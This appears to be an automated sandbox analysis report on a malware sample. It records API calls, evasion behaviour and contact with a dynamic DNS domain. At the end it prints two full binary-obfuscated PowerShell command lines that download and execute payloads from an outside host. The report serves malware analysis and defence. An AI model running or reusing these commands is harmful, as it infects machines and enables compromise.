CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713c90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00713c90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c5f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c6638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c6638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c6638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c5cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c5cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c5cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c5cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c5cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 10, 2021, 8:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c5cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 10, 2021, 8:58 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET http://dreamwatchevent.com/.well-known/pki-validation/Protected%20Client.js
suspicious_features	GET method with no useragent header				suspicious_request	GET http://dreamwatchevent.com/.well-known/pki-validation/Attack.jpg

Connects to a Dynamic DNS Domain (1 event)

domain

freightmgmt.duckdns.org

Performs some HTTP requests (2 events)

request	GET http://dreamwatchevent.com/.well-known/pki-validation/Protected%20Client.js
request	GET http://dreamwatchevent.com/.well-known/pki-validation/Attack.jpg

Allocates read-write-execute memory (usually to unpack itself) (50 out of 354 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bf98000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bc8e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6b9fa000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x064ff000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x064ff000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065dd000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065dd000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065dd000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065dd000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065dd000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065dd000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2488 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6b922000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02660000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a771000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0238a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02382000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02392000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02661000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0247a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02393000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02394000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0248b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0238b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02472000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02485000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02395000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0247c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02396000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0248c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02473000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02474000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02475000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02476000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02478000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02479000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05390000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05391000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05392000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05393000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05394000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05395000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05396000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05397000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 8:58 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05398000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

notepad.exe tried to sleep 125 seconds, actually delayed analysis time by 125 seconds

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\notepad.js

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Documents\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
cmdline	Powershell $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01010000,01110010,01101111,01110100,01100101,01100011,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,01111100,01001001,01000101,01011000,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $gf)\|IEX
